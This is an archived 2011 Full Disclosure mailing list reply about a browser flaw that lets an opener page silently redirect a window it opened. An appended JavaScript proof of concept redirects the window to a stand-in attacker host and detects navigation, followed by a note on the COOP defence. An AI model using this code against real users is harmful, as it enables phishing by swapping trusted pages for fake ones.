Full Disclosure mailing list archives
Re: Google open redirect
From: Dave <mrx () propergander org uk>
Date: Thu, 08 Dec 2011 09:34:49 +0000
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 08/12/2011 09:13, Michal Zalewski wrote:
> For example: did you know that if you click on a link from coredump.cx to
> microsoft.com and it opens in a new window, then a second or two later,
> that coredump.cx in the background can change the URL of the microsoft.com
> window, and point it to evil.com? Heck, coredump.cx can even wait until you
> navigate further down the microsoft.com website - and detect that event
> programmatically. That behavior is enshrined within the current design of
> the same-origin policy, and browser vendors seem hesitant to touch it.
>
> Here's a tiny PoC: http://lcamtuf.coredump.cx/switch/
>
> /mz
I run with NoScript, so the links showed on the initial pages and, when clicked, the same address as the links appeared in the address bar. Running with scripting enabled and clicking the "do it" button caused this to appear in the address bar: "data:text/html;np.cx/beaver/"

I do online banking and, being paranoid, I do check the address bar and look for https and the "verified by: VeriSign, Inc" popup when mousing over the domain. If anything even slightly suspicious occurs when connecting to my banking logon I will inspect the certificate and may even examine the page source, depending on how suspicious I am that my bookmarks may have been compromised or the page is not what I expect it to be. Obviously many users are not this paranoid, otherwise phishing would not be as successful as it is.

Dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTuCEubIvn8UFHWSmAQKN2wgAjMe2BOEo2sSetsfhnEGBGzTjtaW9RYsq
eXyYVHOp8gkt9xkvoob4sjK1LV5zuM43qaP2s3TGcQrsx1A3Aqho+C1NuHP70y2f
5E9l8Y4dibifoERzal8yDjBEMJKqi7fbHuYkWz4xrBFyX9fz8GhZbsGI2Sef5621
Df99Ro6jRGfPqMhFcCQLwgudwdz8BDTBIyoYofpqH29su11mOOWvsRieBEfIcYM8
ENnJ8hsBrYy4f9a4b8KNfe6bukiHkIhaH5Td1r/HIxFiUkphAbmXtU7BD3mfo0Cs
gvLr8ePOHVCHPUo5hiYhA1nhHRrKDqvpd7D6IvE7BgsqMhrhlYN41Q==
=BX4Q
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
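The behaviour Zalewski describes in the quoted message, as an added example that is not part of the thread and is not the code of the lcamtuf.coredump.cx PoC: a page that opens a cross-origin window keeps a WindowProxy for it, cannot read from it, but may still navigate it later and can watch a few cross-origin-readable properties for signs that the user moved on. The function names, the polling heuristic in watchForNavigation, and the URLs are this example's own assumptions; the snapshot heuristic is one way to notice navigation, not necessarily the PoC's method. It runs in a browser; the helpers take any window-like object so they can be exercised outside one.

```javascript
// Added example; not from the post or the lcamtuf.coredump.cx PoC.

// Attacker side ("coredump.cx" in the post). Opens targetUrl in a new window
// and, delayMs later, points that same window at swapUrl.
function openAndSwitchLater(targetUrl, swapUrl, delayMs) {
  // window.open hands back a WindowProxy even for a cross-origin URL.
  // It returns null if a popup blocker intervened or 'noopener' was requested.
  var w = window.open(targetUrl, '_blank');
  if (!w) return null;
  setTimeout(function () {
    // The same-origin policy blocks *reading* w.location.href (SecurityError),
    // but *assigning* w.location is allowed for any window you hold a handle to.
    w.location = swapUrl;
  }, delayMs);
  return w;
}

// What an opener can observe about a cross-origin window without throwing:
// w.closed, w.length (number of frames) and whether w.document is readable
// (only when the window is back on our own origin). A change in this tuple
// is a cheap signal that the user navigated inside the opened window.
// Added heuristic, assumed here; not the detection method the PoC uses.
function snapshot(w) {
  var readable;
  try {
    void w.document;      // throws SecurityError while w is cross-origin
    readable = true;
  } catch (e) {
    readable = false;
  }
  return (readable ? 'same-origin' : 'cross-origin') +
         ':frames=' + w.length +
         ':closed=' + Boolean(w.closed);
}

// Poll the opened window and call onChange(before, after) whenever the
// observable state changes. Returns the interval id so the caller can stop it.
function watchForNavigation(w, intervalMs, onChange) {
  var last = snapshot(w);
  var timer = setInterval(function () {
    var now = snapshot(w);
    if (now !== last) {
      onChange(last, now);
      last = now;
    }
    if (w.closed) clearInterval(timer);
  }, intervalMs);
  return timer;
}

// Demo wiring, only when a real browser document exists. Hypothetical URLs.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  var btn = document.createElement('button');
  btn.textContent = 'do it';
  btn.onclick = function () {
    var w = openAndSwitchLater('https://www.microsoft.com/',
                               'https://evil.example/', 2000);
    if (w) {
      watchForNavigation(w, 250, function (before, after) {
        console.log('opened window changed: ' + before + ' -> ' + after);
      });
    }
  };
  document.body.appendChild(btn);
}
```

Note that `rel="noopener"` on the link does not help against this direction of the attack, because the opener is the attacker and chooses whether to request it. The defence the opened site controls is the `Cross-Origin-Opener-Policy: same-origin` response header: a document served with it is placed in its own browsing context group, so the opener's handle reports `closed === true` and can no longer navigate it. That header did not exist when this thread was written.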
Current thread:
- Google open redirect secure poon (Dec 07)
- Re: Google open redirect Michele Orru (Dec 07)
- Re: Google open redirect Nick FitzGerald (Dec 07)
- Re: Google open redirect Michal Zalewski (Dec 07)
- Re: Google open redirect Luis Santana (Dec 07)
- Re: Google open redirect Michal Zalewski (Dec 07)
- Re: Google open redirect Michal Zalewski (Dec 08)
- Re: Google open redirect Dave (Dec 08)
- Re: Google open redirect Michal Zalewski (Dec 08)
- Re: Google open redirect Michal Zalewski (Dec 07)
- Re: Google open redirect Marsh Ray (Dec 09)
- Re: Google open redirect Michal Zalewski (Dec 09)
- Re: Google open redirect Charles Morris (Dec 12)
- Re: Google open redirect Valdis . Kletnieks (Dec 09)
- Re: Google open redirect Marsh Ray (Dec 11)
- Re: Google open redirect Dave (Dec 09)
- Re: Google open redirect Tavis Ormandy (Dec 10)
- Re: Google open redirect Marsh Ray (Dec 13)
- Re: Google open redirect Tavis Ormandy (Dec 13)